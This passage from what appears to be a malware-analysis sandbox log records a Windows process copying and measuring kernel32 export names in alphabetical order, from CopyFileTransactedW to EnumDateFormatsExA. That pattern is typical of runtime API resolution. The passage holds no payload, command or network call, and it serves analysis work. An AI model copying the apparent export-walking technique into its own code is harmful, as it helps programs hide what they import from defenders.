out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0087.150] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0087.150] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0087.150] lstrlenA (lpString="COPYFILEW") returned 9 [0087.150] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0087.150] lstrlenA (lpString="COPYLZFILE") returned 10 [0087.150] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0087.150] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0087.150] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0087.150] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0087.150] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0087.150] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0087.150] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0087.150] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0087.150] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0087.150] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0087.150] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0087.150] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0087.151] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0087.151] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0087.151] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0087.151] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0087.151] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0087.151] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0087.151] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0087.151] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0087.151] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0087.151] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0087.151] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0087.151] lstrlenA (lpString="CREATEEVENTA") returned 12 [0087.151] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0087.151] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0087.151] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0087.151] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0087.151] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0087.151] lstrlenA (lpString="CREATEEVENTW") returned 12 [0087.151] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0087.151] lstrlenA (lpString="CREATEFIBER") returned 11 [0087.151] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0087.151] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0087.151] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0087.151] lstrlenA (lpString="CREATEFILEA") returned 11 [0087.151] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0087.151] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0087.151] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0087.151] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0087.151] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0087.151] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0087.151] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0087.151] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0087.151] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0087.151] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0087.151] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0087.152] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0087.152] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0087.152] lstrlenA (lpString="CREATEFILEW") returned 11 [0087.152] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0087.152] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0087.152] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0087.152] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0087.152] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0087.152] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0087.152] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0087.152] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0087.152] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0087.152] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0087.152] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0087.152] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0087.152] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0087.152] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0087.152] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0087.152] lstrlenA (lpString="CREATEJOBSET") returned 12 [0087.152] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0087.152] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0087.152] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0087.152] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0087.152] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0087.152] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0087.152] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0087.152] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0087.152] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0087.152] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0087.152] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0087.152] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0087.152] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0087.152] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0087.152] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0087.152] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0087.152] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0087.153] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0087.153] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0087.153] lstrlenA (lpString="CREATEPIPE") returned 10 [0087.153] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0087.153] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0087.153] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0087.153] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0087.153] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0087.153] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0087.153] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0087.153] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0087.153] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0087.153] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0087.153] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0087.153] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0087.153] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0087.153] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0087.153] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0087.153] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0087.153] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0087.153] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0087.153] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0087.153] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0087.153] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0087.153] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0087.153] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0087.153] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0087.153] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0087.153] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0087.153] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0087.153] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0087.153] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0087.154] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0087.154] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0087.154] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0087.154] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0087.154] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0087.154] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0087.154] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0087.154] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0087.154] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0087.154] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0087.154] lstrlenA (lpString="CREATETHREAD") returned 12 [0087.154] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0087.154] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0087.154] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0087.154] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0087.154] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0087.154] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0087.154] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0087.154] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0087.154] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0087.154] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0087.154] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0087.154] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0087.154] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0087.154] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0087.154] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0087.154] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0087.154] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0087.154] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0087.154] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0087.154] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0087.154] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0087.155] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0087.155] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0087.155] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0087.155] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0087.155] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0087.155] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0087.155] lstrlenA (lpString="CTRLROUTINE") returned 11 [0087.155] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0087.155] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0087.155] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0087.155] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0087.155] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0087.155] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0087.155] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0087.155] lstrlenA (lpString="DEBUGBREAK") returned 10 [0087.155] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0087.155] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0087.155] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0087.155] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0087.155] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0087.155] lstrlenA (lpString="DECODEPOINTER") returned 13 [0087.155] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0087.155] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0087.155] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0087.155] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0087.155] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0087.155] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0087.155] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0087.155] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0087.155] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0087.155] lstrlenA (lpString="DELETEATOM") returned 10 [0087.155] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0087.155] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0087.155] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0087.155] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0087.155] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0087.156] lstrlenA (lpString="DELETEFIBER") returned 11 [0087.156] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0087.156] lstrlenA (lpString="DELETEFILEA") returned 11 [0087.156] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0087.156] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0087.156] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0087.156] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0087.156] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0087.156] lstrlenA (lpString="DELETEFILEW") returned 11 [0087.156] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0087.156] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0087.156] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0087.156] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0087.156] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0087.156] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0087.156] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0087.156] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0087.156] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0087.156] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0087.156] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0087.156] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0087.156] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0087.156] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0087.156] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0087.156] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0087.156] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0087.156] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0087.156] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0087.156] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0087.156] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0087.156] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0087.156] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0087.156] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0087.156] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0087.156] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0087.156] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0087.157] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0087.157] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0087.157] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0087.157] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0087.157] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0087.157] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0087.157] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0087.157] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0087.157] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0087.157] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0087.157] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0087.157] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0087.157] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0087.157] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0087.157] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0087.157] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0087.157] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0087.157] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0087.157] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0087.157] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0087.157] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0087.157] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0087.157] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0087.157] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0087.157] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0087.157] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0087.157] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0087.157] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0087.157] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0087.157] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0087.157] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0087.157] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0087.157] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0087.157] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0087.157] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0087.158] lstrcpyA 